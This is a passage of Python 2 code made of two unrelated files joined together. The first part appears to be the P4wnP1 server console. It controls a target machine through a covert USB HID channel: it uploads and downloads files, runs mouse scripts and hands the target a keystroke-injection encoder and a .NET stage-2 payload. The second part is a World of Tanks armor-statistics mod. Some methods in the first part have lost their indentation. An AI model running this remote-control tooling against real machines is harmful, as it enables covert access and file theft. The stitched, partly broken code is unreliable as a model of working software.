            while not hasChosen:
                # print out available scripts
                print "Choose script by number or name:"
                print "================================\n"
                for i in range(len(available_scripts)):
                    print "{0}:\t{1}".format(i, available_scripts[i])
                given = raw_input("Your selection or 'x' to abort: ")
                if given == "x":
                    print "abort ..."
                    return
                # try to choose by name
                if given in available_scripts:
                    scriptNum = available_scripts.index(given)
                    hasChosen = True
                    break
                # try to choose by number
                try:
                    scriptNum = int(given)
                    if scriptNum >= 0 and scriptNum < len(available_scripts):
                        hasChosen = True
                        break
                    else:
                        print "Invalid input..."
                        continue
                except ValueError:
                    print "Invalid input..."
                    continue
            if hasChosen:
                scriptpath = self.config["PATH_MOUSESCRIPT"] + "/" + available_scripts[scriptNum]
            else:
                return
        # read in script (line wise, the parser expects a list of lines)
        script = ""
        with open(scriptpath, "r") as f:
            script = f.readlines()
        # execute script
        print "Executing MouseScript ..."
        try:
            self.mousescriptparser.executeScript(script)
        except KeyboardInterrupt:
            print "MouseScript execution interrupted"
            return
        print "... finished"
    def do_lcd(self, line):
        """Change the local working directory (on P4wnP1 itself)."""
        print FileSystem.cd(line)
    def do_lpwd(self, line):
        """Print the local working directory (on P4wnP1 itself)."""
        print FileSystem.pwd()
def do_lls(self, line):
if len(line.strip()) > 0:
res = FileSystem.ls_native2(line.split(" "))
else:
res = FileSystem.ls_native2()
for l in res:
print l
    def client_call_open_file(self, remote_filename, remote_filemode, remote_fileaccess):
        """
        Ask the client to open a file; blocks and returns the (success, result)
        pair from callMethod (result is a packed "!i" stream id on success).
        """
        # null terminated filename + FileMode byte + FileAccess byte
        method_args = struct.pack("!{0}sxBB".format(len(remote_filename)), remote_filename, remote_filemode, remote_fileaccess)
        # we could use the create proc handler
        return self.client.callMethod("core_fs_open_file", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
    def client_call_close_stream(self, stream_id):
        """Ask the client to close the remote stream (signed int id); blocks for the result."""
        method_args = struct.pack("!i", stream_id)
        # we could use the create proc handler
        return self.client.callMethod("core_fs_close_stream", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
def client_call_open_stream_channel(self, stream_id, passthrough = True):
pt = 1
if not passthrough:
pt = 0
method_args = struct.pack("!iB", stream_id, pt)
# we could use the create proc handler
return self.client.callMethod("core_open_stream_channel", method_args, self.handler_pass_through_result, error_handler=self.handler_pass_through_result, waitForResult = True, deliverResult = True)
def client_call_FS_command(self, command, command_args=""):
    """Run a remote file-system command on the client and print its result.

    Both command and arguments are sent as null-terminated strings; the
    client's reply is a null-terminated string that is printed either as
    output or as an error message depending on the success flag.
    """
    packed = struct.pack("!{0}sx{1}sx".format(len(command), len(command_args)),
                         command, command_args)
    no_err, raw_result = self.client.callMethod("core_call_fs_command", packed,
                                                self.handler_pass_through_result,
                                                error_handler=self.handler_pass_through_result,
                                                waitForResult=True, deliverResult=True)
    text, _ = StructHelper.extractNullTerminatedString(raw_result)
    if no_err:
        print(text)
    else:
        print("Remote file system error: {0}".format(text))
def do_pwd(self, line):
    # Print the remote (client-side) working directory.
    self.client_call_FS_command("pwd")
def do_ls(self, line):
    # List the remote directory; extra arguments are forwarded verbatim.
    self.client_call_FS_command("ls", line)
def do_cd(self, line):
    # Change the remote working directory.
    self.client_call_FS_command("cd", line)
@staticmethod
def askYesNo(default_yes = False):
    """Prompt the user until a yes/no answer is given.

    An empty answer falls back to the default; returns True for yes,
    False for no.
    """
    while True:
        if default_yes:
            answer = raw_input("(y)es / (n)o, default yes: ") or "y"
        else:
            answer = raw_input("(y)es / (n)o, default no: ") or "n"
        normalized = answer.lower()
        if normalized in ("y", "yes"):
            return True
        if normalized in ("n", "no"):
            return False
        print("invalid input")
def do_upload(self, line):
    """Upload a local file to the connected client.

    usage: upload <local_source> [<remote_target>]
    When no target is given, the source's base name is reused remotely.
    """
    args = line.split(" ")
    target_path = ""
    source_path = ""
    if len(args) == 0 or len(line) == 0:
        print "you need to provide a file source"
        return
    elif len(args) == 1:
        source_path = args[0].strip()
        target_path = FileSystem.getFileName(source_path)
    elif len(args) == 2:
        source_path = args[0].strip()
        target_path = args[1].strip()
    else:
        print "wrong argument count"
        return
    sourcefile = None
    # try to open local file first
    try:
        sourcefile = FileSystem.open_local_file(source_path, FileMode.Open, FileAccess.Read)
    except Exception as e:
        print e.message
        return
    # Try to open remote file (CreateNew fails if the file already exists)
    success, result = self.client_call_open_file(remote_filename = target_path,
                                                 remote_filemode = FileMode.CreateNew, # don't overwrite
                                                 remote_fileaccess = FileAccess.Write)
    stream_id = -1
    if success:
        stream_id = struct.unpack("!i", result)[0] # signed int
        print "Remote FileStream with ID '{0}' opened".format(stream_id)
        print stream_id
    else:
        print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
        print "Seems the target file already exists, access is forbidden or the path is invalid. Do you want to force overwrite?"
        overwrite = P4wnP1.askYesNo(default_yes=True)
        if overwrite:
            # second attempt with FileMode.Create, which truncates an existing file
            success, result = self.client_call_open_file(remote_filename = target_path,
                                                         remote_filemode = FileMode.Create, # overwrite if exists
                                                         remote_fileaccess = FileAccess.Write)
            if success:
                stream_id = struct.unpack('!i', result)[0] #signed int
                print "Remote FileStream with ID '{0}' opened".format(stream_id)
            else:
                print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
                return
        else:
            return
    print "Uploading local file {0} to remote file {1}".format(source_path, target_path)
    # if we are here, file open succeeded and we request a channel for the filestream
    stream_channel = None
    success, result = self.client_call_open_stream_channel(stream_id, passthrough=False)
    if success:
        channel_id = struct.unpack("!I", result)[0] # unsigned int
        print "Opened stream channel with id {0}".format(channel_id)
        # bind stream to local StreamChannel object
        stream_channel = StreamChannel(channel_id, stream_id, False)
        # add channel to client
        self.client.addChannel(stream_channel)
    else:
        print "Open channel Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
        # ToDo: Remote stream should be destroyed
        return
    starttime = time.time()
    # if here, we should have a valid stream_channel
    # inform client that the channel has link
    self.client_call_inform_channel_added(stream_channel)
    # copy data to upload file in chunks; a zero-length read marks EOF
    chunksize = 30000
    readcount = -1
    no_error = True
    while readcount != 0:
        readen = sourcefile.read(chunksize)
        readcount = len(readen)
        writeres = stream_channel.Write(readen)
        sys.stdout.write(".")
        if writeres == -1:
            # write error (or channel closed)
            print "\nError writing to file channel"
            no_error = False
            break
        sys.stdout.flush()
    sourcefile.close()
    if no_error:
        stream_channel.Flush()
        # request streamChannel close
        stream_channel.Close()
        endtime = time.time()
        print "\nUpload of '{0}' finished in {1:4.2f} seconds".format(source_path, endtime - starttime)
    # Request close of remote FileStream file
    if self.client.isConnected():
        success, result = self.client_call_close_stream(stream_id)
    else:
        print "Remote file handle couldn't be closed, because client disconnected"
    print
def do_download(self, line):
    """Download a remote file from the connected client.

    usage: download <remote_source> [<local_target>]
    When no target is given, the source's base name is reused locally.
    """
    args = line.split(" ")
    target_path = ""
    source_path = ""
    if len(args) == 0 or len(line) == 0:
        print "you need to provide a file source"
        return
    elif len(args) == 1:
        source_path = args[0].strip()
        target_path = FileSystem.getFileName(source_path)
    elif len(args) == 2:
        source_path = args[0].strip()
        target_path = args[1].strip()
    else:
        print "wrong argument count"
        return
    print "Downloading remote file {0} to local file {1}".format(source_path, target_path)
    targetfile = None
    # try to open local file first (CreateNew fails if the file already exists)
    try:
        targetfile = FileSystem.open_local_file(target_path, FileMode.CreateNew, FileAccess.Write)
    except Exception as e:
        print e.message
        print "Seems the file '{0}' exists or write permissions are missing!".format(target_path)
        print "Do you want to try to overwrite the file"
        overwrite = P4wnP1.askYesNo(default_yes=True)
        if overwrite:
            try:
                targetfile = FileSystem.open_local_file(target_path, FileMode.Create, FileAccess.Write)
            except Exception as e:
                print e.message
                return
        else:
            return
    # Try to open remote file
    success, result = self.client_call_open_file(remote_filename = source_path,
                                                 remote_filemode = FileMode.Open, # don't overwrite
                                                 remote_fileaccess = FileAccess.Read)
    stream_id = -1
    if success:
        stream_id = struct.unpack("!i", result)[0] # signed int
        print "Remote FileStream with ID '{0}' opened".format(stream_id)
        print stream_id
    else:
        print "File open Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
        print "Seems the source file doesn't exist, aborting."
        targetfile.close()
        return
    # if we are here, file open succeeded and we request a channel for the filestream
    stream_channel = None
    success, result = self.client_call_open_stream_channel(stream_id,
                                                           passthrough=False)
    if success:
        channel_id = struct.unpack("!I", result)[0] # unsigned int
        print "Opened stream channel with id {0}".format(channel_id)
        # bind stream to local StreamChannel object
        stream_channel = StreamChannel(channel_id, stream_id, passthrough=False)
        # add channel to client
        self.client.addChannel(stream_channel)
    else:
        print "Open channel Error: {0}".format(StructHelper.extractNullTerminatedString(result)[0])
        # ToDo: Remote stream should be destroyed
        return
    starttime = time.time()
    # if here, we should have a valid stream_channel
    # inform client that the channel has link
    self.client_call_inform_channel_added(stream_channel)
    # read the remote stream in chunks; a zero-length read marks EOF
    count = -1
    no_error = True
    chunksize = 30000
    while count != 0:
        try:
            readen = stream_channel.Read(chunksize)
            count = len(readen)
            if count > 0:
                sys.stdout.write(".")
                sys.stdout.flush()
                targetfile.write(readen)
            elif count == 0:
                targetfile.flush()
                targetfile.close()
        except ChannelException as e:
            print(e.__str__())
            no_error = False
            targetfile.close()
            return # abort further reading
    # close remote stream
    if no_error:
        # request streamChannel close
        stream_channel.Close()
        endtime = time.time()
        print "\nDownload of '{0}' finished in {1:4.2f} seconds".format(source_path, endtime - starttime)
    # Request close of remote FileStream file
    if self.client.isConnected():
        success, result = self.client_call_close_stream(stream_id)
    else:
        print "Remote file handle couldn't be closed, because client disconnected"
    print
if __name__ == "__main__":
    # Resolve all configured paths relative to the directory this script lives in.
    rundir = os.path.dirname(sys.argv[0])
    basedir = os.path.abspath(rundir) + "/"
    config = Config.conf_to_dict(basedir + "/config.txt")
    config["BASEDIR"] = basedir
    # replace relative path'
    for key in config:
        if key.startswith("PATH_"):
            config[key] = os.path.abspath(config["BASEDIR"] + config[key])
    try:
        # the same raw HID device file is opened twice: once for reading, once for writing
        dev_file_in_path = config["HID_RAW_DEV"]
        dev_file_out_path = config["HID_RAW_DEV"]
        HIDin_file = open(dev_file_in_path, "rb")
        HIDout_file = open(dev_file_out_path, "wb")
        # the linklayer starts several communication threads
        # for raw HID communication, the threads are started with separate start() method
        ll = LinkLayer(HIDin_file, HIDout_file)
        # transport layer automatically registers for linklayer events using pydispatcher
        # in current implementation LinkLayer does nothing but providing an inbound queue
        # Note: As every stream crosses TransportLayer, that would be the place to manipulate
        # streams if needed (for example encryption)
        tl = TransportLayer()
        enc = DuckEncoder()
        enc.setKeyDevFile(config["HID_KEYBOARD_DEV"])
        enc.setLanguage(config["KEYBOARD_LANG"])
        p4wnp1 = P4wnP1(ll, tl, config, duckencoder=enc)
        # hand the stage-2 payload to the server before accepting connections
        with open(config["PATH_STAGE2_DOTNET"], "rb") as f:
            p4wnp1.set_stage2(f.read())
        p4wnp1.start() # starts link layer (waiting for initial connection) and server input thread
        p4wnp1.cmdloop()
    except:
        import traceback
        import exceptions
        #print "Exception: " + str(type(e)) + ":"
        #print "\t{}".format(e.message)
        #exc_type, exc_obj, exc_tb = sys.exc_info()
        #print "\tLine: {}".format(exc_tb.tb_lineno)
        # a normal SystemExit (e.g. from the 'exit' command) is not worth a traceback
        if sys.exc_type != exceptions.SystemExit:
            traceback.print_exc()
        raise
    finally:
        # always tear down threads and device handles, even after a crash
        print "Cleaning Up..."
        ll.stop() # send stop event to read and write loop of link layer
        HIDout_file.close()
        HIDin_file.close()
        try:
            p4wnp1.stop()
        except:
            pass
        sys.exit()
|
mod_armoring_extended206.py | # -*- coding: utf-8 -*-
import codecs
import json
import os
import random
import re
import string
import threading
import urllib
import urllib2
from functools import partial
import BigWorld
import Math
import GUI
from constants import AUTH_REALM
from constants import VEHICLE_HIT_EFFECT
from gui import g_guiResetters
from gui.app_loader import g_appLoader
from gui.Scaleform import Minimap
from gui.Scaleform.Battle import Battle
from gui.Scaleform.daapi.view.lobby.LobbyView import LobbyView
from Vehicle import Vehicle
from VehicleEffects import DamageFromShotDecoder
from helpers import getLanguageCode
class _GUIConfig(object):
    """Thin wrapper around the optional BigWorld.mods_gui settings API."""

    def __init__(self):
        # name -> gui handle returned by BigWorld.mods_gui
        self.gui = {}

    def register(self, name, template_func, settings_dict, apply_func):
        """Register a settings page and immediately apply its stored settings."""
        if not hasattr(BigWorld, 'mods_gui'):
            return
        # noinspection PyProtectedMember
        handle = BigWorld.mods_gui(name, template_func(), settings_dict, apply_func)
        self.gui[name] = handle
        apply_func(handle.actual_settings)

    def update(self, name, template_func):
        """Push a freshly built template to an already-registered page."""
        self.gui[name].update_template(template_func())
class _Config(object):
    """Mod configuration: defaults, i18n strings and JSON (de)serialization."""
    def __init__(self):
        self.ids = 'armoring_extended'
        self.version = '2.06 (23.02.2016)'
        self.author = 'by spoter, reven86'
        # config and translations live under res_mods/configs/spoter_mods/<ids>/
        self.path_config = './res_mods/configs/spoter_mods/%s/' % self.ids
        self.path_lang = '%si18n/' % self.path_config
        # user-tunable settings, edited through the mods_gui settings page
        self.data = {
            'enabled' : True,
            'activate_message': True,
            'only_HeavyTank' : False,
            'show_text_shadow': True,
        }
        # default (English) UI strings; overridden by i18n/<lang>.json when present
        self.i18n = {
            'UI_description' : 'Armoring Extended',
            'UI_in_battle_main_text' : '<font size="14" color="#BDFA64"><font color="#fdf498">{NumDmg} Blocked <img align="top" src="img://gui/maps/icons/library/ClanBattleResultIcon-1.png" height="16" width="16" vspace="-3" '
                                       '/><font '
                                       'color="#fdf498">{AvgDmg}</font> damage</font>',
            'UI_in_battle_activate_message' : 'Armoring Extended: Activated',
            'UI_in_battle_activate_message_only_HeavyTank': 'Armoring Extended: Activated, only Heavy Tanks',
            'UI_setting_activate_message_text' : 'Show activation message in battle',
            'UI_setting_activate_message_tooltip' : '{HEADER}Info:{/HEADER}{BODY}When battle start, show notification message about mode Armoring Extended{/BODY}',
            'UI_setting_heavy_tank_only_text' : 'Enable mod only on Heavy Tank',
            'UI_setting_heavy_tank_only_tooltip' : '{HEADER}Info:{/HEADER}{BODY}Enable mod only on Heavy Tank, all other not available{/BODY}',
            'UI_setting_show_text_shadow_text' : 'Show shadows on text',
            'UI_setting_show_text_shadow_tooltip' : '{HEADER}Info:{/HEADER}{BODY}Show shadow on text in battle flash{/BODY}',
        }
        self.load_lang()
        self.no_gui = False
        # on-screen position of the text flash, persisted to <ids>.json
        self.json = {
            'x': 0.0,
            'y': 441.95
        }
        # merge saved position over the defaults (unknown keys are ignored)
        new_config = self.load_json(self.ids, self.json, self.path_config)
        for setting in new_config:
            if setting in self.json:
                self.json[setting] = new_config[setting]
    def load_lang(self):
        # Overlay translated strings for the client language over the defaults.
        lang = str(getLanguageCode()).lower()
        new_config = self.load_json(lang, self.i18n, self.path_lang)
        for setting in new_config:
            if setting in self.i18n:
                self.i18n[setting] = new_config[setting]
    def template_settings(self):
        # Settings-page template consumed by BigWorld.mods_gui.
        return {
            'modDisplayName' : self.i18n['UI_description'],
            'settingsVersion': 104,
            'enabled' : self.data['enabled'],
            'column1' : [{
                'type' : 'CheckBox',
                'text' : self.i18n['UI_setting_activate_message_text'],
                'value' : self.data['activate_message'],
                'tooltip': self.i18n['UI_setting_activate_message_tooltip'],
                'varName': 'activate_message'
            }, {
                'type' : 'CheckBox',
                'text' : self.i18n['UI_setting_heavy_tank_only_text'],
                'value' : self.data['only_HeavyTank'],
                'tooltip': self.i18n['UI_setting_heavy_tank_only_tooltip'],
                'varName': 'only_HeavyTank'
            }],
            'column2' : [{
                'type' : 'CheckBox',
                'text' : self.i18n['UI_setting_show_text_shadow_text'],
                'value' : self.data['show_text_shadow'],
                'tooltip': self.i18n['UI_setting_show_text_shadow_tooltip'],
                'varName': 'show_text_shadow'
            }]
        }
    def apply_settings(self, settings):
        # GUI callback: copy known keys and refresh the displayed template.
        for setting in settings:
            if setting in self.data:
                self.data[setting] = settings[setting]
        _gui_config.update('%s' % self.ids, self.template_settings)
    @staticmethod
    def json_comments(text):
        # Strip '#' and '//' comments (whole-line and inline) so the relaxed
        # config files can still be fed to json.loads.
        regex = r'\s*(#|\/{2}).*$'
        regex_inline = r'(:?(?:\s)*([A-Za-z\d\.{}]*)|((?<=\").*\"),?)(?:\s)*(((#|(\/{2})).*)|)$'
        lines = text.split('\n')
        excluded = []
        for index, line in enumerate(lines):
            if re.search(regex, line):
                if re.search(r'^' + regex, line, re.IGNORECASE):
                    # whole-line comment: remember it for removal
                    excluded.append(lines[index])
                elif re.search(regex_inline, line):
                    # trailing comment: keep only the value part
                    lines[index] = re.sub(regex_inline, r'\1', line)
        for line in excluded:
            lines.remove(line)
        return '\n'.join(lines)
    def byte_ify(self, inputs):
        # Recursively encode unicode strings to utf-8 byte strings (Python 2).
        if inputs:
            if isinstance(inputs, dict):
                return {self.byte_ify(key): self.byte_ify(value) for key, value in inputs.iteritems()}
            elif isinstance(inputs, list):
                return [self.byte_ify(element) for element in inputs]
            elif isinstance(inputs, unicode):
                return inputs.encode('utf-8')
            else:
                return inputs
        return inputs
    def load_json(self, name, config_old, path, save=False):
        """Load <path><name>.json, or write config_old there when save=True.

        Returns the loaded dict, or config_old when saving / on any failure.
        A missing file is created from the defaults.
        """
        config_new = config_old
        if not os.path.exists(path):
            os.makedirs(path)
        new_path = '%s%s.json' % (path, name)
        if save:
            with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
                data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
                json_file.write('%s' % self.byte_ify(data))
                json_file.close()
            config_new = config_old
        else:
            if os.path.isfile(new_path):
                try:
                    with codecs.open(new_path, 'r', encoding='utf-8-sig') as json_file:
                        data = self.json_comments(json_file.read().decode('utf-8-sig'))
                        config_new = self.byte_ify(json.loads(data))
                        json_file.close()
                except Exception as e:
                    print '[ERROR]: %s' % e
            else:
                # no config yet: write the defaults so the user has a file to edit
                with codecs.open(new_path, 'w', encoding='utf-8-sig') as json_file:
                    data = json.dumps(config_old, sort_keys=True, indent=4, ensure_ascii=False, encoding='utf-8-sig', separators=(',', ': '))
                    json_file.write('%s' % self.byte_ify(data))
                    json_file.close()
                config_new = config_old
                print '[ERROR]: [Not found config, create default: %s' % new_path
        return config_new
    def load(self):
        # Entry point called once at module import time.
        self.do_config()
        print '[LOAD_MOD]: [%s v%s, %s]' % (self.ids, self.version, self.author)
    def do_config(self):
        # Register with mods_gui when available; otherwise retry every second.
        if hasattr(BigWorld, 'mods_gui'):
            _gui_config.register(name='%s' % self.ids, template_func=self.template_settings, settings_dict=self.data, apply_func=self.apply_settings)
        else:
            if not self.no_gui:
                BigWorld.callback(1.0, self.do_config)
class _TextFlash(object):
    """Python-side bridge to the 'Extended.swf' text overlay in the battle UI."""
    def __init__(self, parent_ui, battleWindow, name, tooltip):
        self.__parentUI = parent_ui
        self.__battleWindow = battleWindow
        self.__flashObject = None  # assigned in start() once the swf reports in
        self.name = name
        self.tooltip = tooltip
        self.debug = False  # when True, log() prints incoming flash log lines
        # register callbacks the ActionScript side invokes, then load the swf
        self.__battleWindow.addExternalCallback('%s.start' % self.name, self.start)
        self.__battleWindow.addExternalCallback('%s.log' % self.name, self.log)
        self.__battleWindow.addExternalCallback('%s.position' % self.name, self.position)
        self.__battleWindow.getRoot().loadSwf('Extended.swf', '%s' % self.name, None)
        # text placement and font defaults; x/y restored from the saved config
        self.text = {
            'x' : _config.json.get('x', 100),
            'y' : _config.json.get('y', 100),
            'alignX' : 'center',
            'alignY' : 'center',
            'default_font' : '$IMELanguageBar',
            'default_font_size' : 14,
            'default_font_color': '#BDFA64'
        }
        # drop-shadow parameters, applied in set_def_config when enabled
        self.shadow = {
            'enabled' : _config.data.get('show_text_shadow', True),
            'distance': 0,
            'angle' : 90,
            'color' : '#000000',
            'alpha' : 100,
            'size' : 3,
            'strength': 200
        }
        # optional background image behind the text (disabled by default)
        self.background = {
            'enabled': False,
            'image' : '',
            'x' : 218,
            'y' : 448,
            'width' : 250,
            'height' : 27,
            'alpha' : 80
        }
    def start(self, *args):
        # Callback from flash when the swf finished loading: bind the object
        # and push the initial configuration.
        self.__flashObject = self.__parentUI.getMember('_level0.%s.battleFlash' % self.name)
        self.__flashObject.script = self
        g_guiResetters.add(self.as_onScreenResS)
        self.set_def_config()
        self.as_onScreenResS()
    def set_def_config(self):
        # Apply tooltip, position, shadow and background to the flash object.
        self.as_setTextS('')
        self.as_setToolTipS('%s' % self.tooltip)
        self.as_setPositionS(self.text['x'], self.text['y'])
        if self.shadow['enabled']:
            self.as_setShadowS(self.shadow['distance'], self.shadow['angle'], self.shadow['color'], self.shadow['alpha'], self.shadow['size'], self.shadow['strength'])
        if self.background['enabled']:
            self.as_setBgS(self.background['image'], self.background['x'], self.background['y'], self.background['width'], self.background['height'], self.background['alpha'])
    def destroy(self):
        # Drop all references so the battle window can be garbage collected.
        g_guiResetters.discard(self.as_onScreenResS)
        self.__flashObject = None
        self.__battleWindow = None
        self.__parentUI = None
    def set_visible(self, boole):
        if self.__flashObject:
            self.as_setVisibleS(boole)
    def set_shadow(self, distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow):
        if self.__flashObject:
            self.as_setShadowS(distance_shadow, angle_shadow, color_shadow, alpha_shadow, size_shadow, strength_shadow)
    def set_bg(self, image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg):
        if self.__flashObject:
            self.as_setBgS(image_bg, x_pos_bg, y_pos_bg, width_bg, height_bg, alpha_bg)
    def set_text_flash(self, text):
        # Wrap the caller's text in the configured default font tag.
        _text = '<font size="%s" face="%s" color="%s" vspace="3" >%s</font>' % (self.text['default_font_size'], self.text['default_font'], self.text['default_font_color'], text)
        self.as_setTextS(_text)
    def set_text(self, text):
        if self.__flashObject:
            self.set_text_flash(text)
    @property
    def flashObject(self):
        return self.__flashObject
    def log(self, _, text):
        # Flash-side log callback; printed only in debug mode.
        if self.debug:
            print('Extended.swf', '%s' % text)
    def position(self, _, posX, posY):
        # Flash-side callback when the user drags the text: persist the position.
        self.text['x'] = posX
        self.text['y'] = posY
        _config.json['x'] = posX
        _config.json['y'] = posY
        _config.json = _config.load_json(_config.ids, _config.json, _config.path_config, True)
        self.log(None, 'updatePosition : %s / %s in %s' % (posX, posY, self.name))
    # --- thin as_* wrappers: forward to the flash object when it is bound ---
    def as_onScreenResS(self):
        wRes, hRes = GUI.screenResolution()
        if self.flashObject:
            self.flashObject.as_onScreenRes(wRes, hRes)
    def as_setTextS(self, text):
        if self.flashObject:
            self.flashObject.as_setText(text)
    def as_setSizeS(self, width, height):
        if self.flashObject:
            self.flashObject.as_setSize(width, height)
    def as_setVisibleS(self, boole):
        if self.flashObject:
            self.flashObject.as_setVisible(boole)
    def as_setPositionS(self, posX, posY):
        if self.flashObject:
            self.flashObject.as_setPosition(posX, posY)
    def as_setToolTipS(self, text):
        if self.flashObject:
            self.flashObject.as_setToolTip(text)
    def as_setShadowS(self, distance, angle, color, alpha, size, strength):
        if self.flashObject:
            self.flashObject.as_setShadow(distance, angle, color, alpha, size, strength)
    def as_setBgS(self, image, posX, posY, width, height, alpha):
        if self.flashObject:
            self.flashObject.as_setBG(image, posX, posY, width, height, alpha)
class ArmoringExtended(object):
    """Counts hits blocked by armor and shows a running total in the battle UI."""
    def __init__(self):
        self.on_off = False  # True while the mod is active for the current battle
        self.flash = None  # _TextFlash instance, attached by the Battle hooks
        self.num = 0  # number of blocked hits counted so far
        self.avgDMG = 0  # average damage of the latest blocking-candidate shell
        self.SumAvgDmg = 0  # accumulated blocked-damage estimate
        self.list = {}  # shot counter -> bookkeeping dict (or None once handled)
        self.shots = 0  # monotonically increasing shot counter, keys self.list
    def cleanup_battle_data(self):
        # Reset all per-battle counters.
        self.num = 0
        self.avgDMG = 0
        self.SumAvgDmg = 0
        self.list = {}
        self.shots = 0
    @staticmethod
    def message():
        # Show the activation message in the player messages panel.
        # (the random letter suffix makes each message key unique)
        app = g_appLoader.getDefBattleApp()
        if _config.data['only_HeavyTank']:
            app.call('battle.PlayerMessagesPanel.ShowMessage',
                     ['%s%s' % (_config.i18n['UI_in_battle_activate_message_only_HeavyTank'], random.choice(string.ascii_letters)), _config.i18n['UI_in_battle_activate_message_only_HeavyTank'].decode('utf-8-sig'), 'gold'])
        else:
            app.call('battle.PlayerMessagesPanel.ShowMessage', ['%s%s' % (_config.i18n['UI_in_battle_activate_message'], random.choice(string.ascii_letters)), _config.i18n['UI_in_battle_activate_message'].decode('utf-8-sig'), 'gold'])
    def start_battle(self):
        # Decide whether the mod is active for this battle and schedule UI updates.
        if not _config.data['enabled']: return
        if _config.data['only_HeavyTank']:
            if 'heavyTank' in BigWorld.player().vehicleTypeDescriptor.type.tags:
                self.on_off = True
        else: self.on_off = True
        if _config.data['activate_message'] and self.on_off:
            BigWorld.callback(5.0, self.message)
            # NOTE(review): nesting reconstructed from a flattened source; shout_damage
            # may originally be scheduled outside this condition - confirm upstream.
            BigWorld.callback(5.0, self.shout_damage)
    def clear_data(self):
        self.avgDMG = 0
    @staticmethod
    def blocked_armor_hit(vehicle, decode_comp_name):
        # Re-trace the shot ray through the vehicle's collision model and report
        # whether it could have hit primary (homogenized) armor.
        can_hit_primary_armor = None
        comp_matrix = Math.Matrix(vehicle.appearance.modelsDesc[decode_comp_name.componentName]['model'].matrix)
        first_hit_dir_local = decode_comp_name.matrix.applyToAxis(2)
        first_hit_dir = comp_matrix.applyVector(first_hit_dir_local)
        first_hit_point = decode_comp_name.matrix.translation
        first_hit_pos = comp_matrix.applyPoint(first_hit_point)
        world_to_veh_matrix = Math.Matrix(vehicle.model.matrix)
        world_to_veh_matrix.invert()
        # extend the ray slightly before and well past the hit point
        start_point = world_to_veh_matrix.applyPoint(first_hit_pos - first_hit_dir)
        end_point = world_to_veh_matrix.applyPoint(first_hit_pos + first_hit_dir.scale(10.0))
        for compDescr, comp_matrix, isAttached in vehicle.getComponents():
            if not isAttached: continue
            collisions = compDescr['hitTester'].localHitTest(comp_matrix.applyPoint(start_point), comp_matrix.applyPoint(end_point))
            if collisions is None: continue
            for dist, _, hitAngleCos, matKind in collisions:
                mat_info = compDescr['materials'].get(matKind)
                can_hit_primary_armor = True if mat_info is not None and mat_info.useArmorHomogenization else False
                if can_hit_primary_armor: break
            if can_hit_primary_armor: break
        return can_hit_primary_armor
    def shout_damage(self):
        # Fold the pending avgDMG into the totals and refresh the flash text.
        if self.avgDMG != 0:
            self.num += 1
            self.SumAvgDmg += self.avgDMG
            format_str = {
                'NumDmg': BigWorld.wg_getIntegralFormat(self.num),
                'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)
            }
            text = '%s' % _config.i18n['UI_in_battle_main_text']
            self.flash.set_text(text.format(**format_str))
            self.clear_data()
    def shout_damage_hp(self, shots):
        # Delayed check for a pierced hit: only count it as blocked when no
        # health change was attributed to it in the meantime.
        if self.list[shots]:
            if self.list[shots]['isDamage']:
                self.list[shots] = None
                return
            if self.list[shots]['avgDMG'] != 0:
                self.num += 1
                self.SumAvgDmg += self.list[shots]['avgDMG']
                format_str = {
                    'NumDmg': BigWorld.wg_getIntegralFormat(self.num),
                    'AvgDmg': BigWorld.wg_getIntegralFormat(self.SumAvgDmg)
                }
                text = '%s' % _config.i18n['UI_in_battle_main_text']
                self.flash.set_text(text.format(**format_str))
            self.list[shots] = None
    def shot(self, vehicle, attacker_id, points, effects_index):
        # Hook target: called for every shot effect shown on the player vehicle.
        if not (_config.data['enabled'] and self.on_off): return
        if not vehicle.isStarted: return
        if not vehicle.isPlayerVehicle: return
        # ignore friendly fire
        if BigWorld.player().team == BigWorld.player().arena.vehicles.get(attacker_id)['team']: return
        if vehicle.health < 1: return
        self.shots += 1
        index_hit, decode_comp_name = DamageFromShotDecoder.decodeHitPoints(points, vehicle.typeDescriptor)
        #compName = decode_comp_name[0].componentName if decode_comp_name else None
        has_pierced_hit = index_hit >= VEHICLE_HIT_EFFECT.ARMOR_PIERCED
        is_blocked = self.blocked_armor_hit(vehicle, decode_comp_name[0]) if decode_comp_name else False
        # NOTE(review): nesting below reconstructed from a flattened source - confirm upstream.
        if is_blocked:
            # find the shell matching this effect to estimate its damage
            for shell in BigWorld.player().arena.vehicles.get(attacker_id)['vehicleType'].gun['shots']:
                if effects_index == shell['shell']['effectsIndex']:
                    type_shell = shell['shell']['kind']
                    if type_shell != 'HIGH_EXPLOSIVE':
                        self.avgDMG, _ = shell['shell']['damage']
                        if has_pierced_hit:
                            # pierced: defer the decision until heal() had a chance to run
                            self.list[self.shots] = {
                                'id' : attacker_id,
                                'avgDMG' : self.avgDMG,
                                'isDamage': False,
                                'used' : False
                            }
                            BigWorld.callback(0.15, partial(self.shout_damage_hp, self.shots))
                        else: self.shout_damage()
                    break
        else: self.clear_data()
    def heal(self, vehicle, new_health, attacker_id):
        # Hook target for health changes: mark the matching pending shot as
        # real damage so it is not counted as blocked.
        if not (_config.data['enabled'] and self.on_off): return
        if not vehicle.isStarted or not vehicle.isPlayerVehicle: return
        is_damage = max(0, new_health)
        if is_damage:
            for shots in self.list:
                if self.list[shots] and 'id' in self.list[shots] and self.list[shots]['id'] == attacker_id and not self.list[shots]['used']:
                    self.list[shots]['isDamage'] = True
                    self.list[shots]['used'] = True
                    break
class Statistics(object):
    """One-shot Google Analytics usage ping, sent from a background thread."""
    def __init__(self):
        self.analytics_started = False  # guards against duplicate sends
        self._thread_analytics = None
        self.tid = 'UA-57975916-9'  # GA tracking id
        self.description_analytics = 'Мод: "Броняня"'
    def analytics_do(self):
        # Send a single 'screenview' hit; runs on the worker thread started by start().
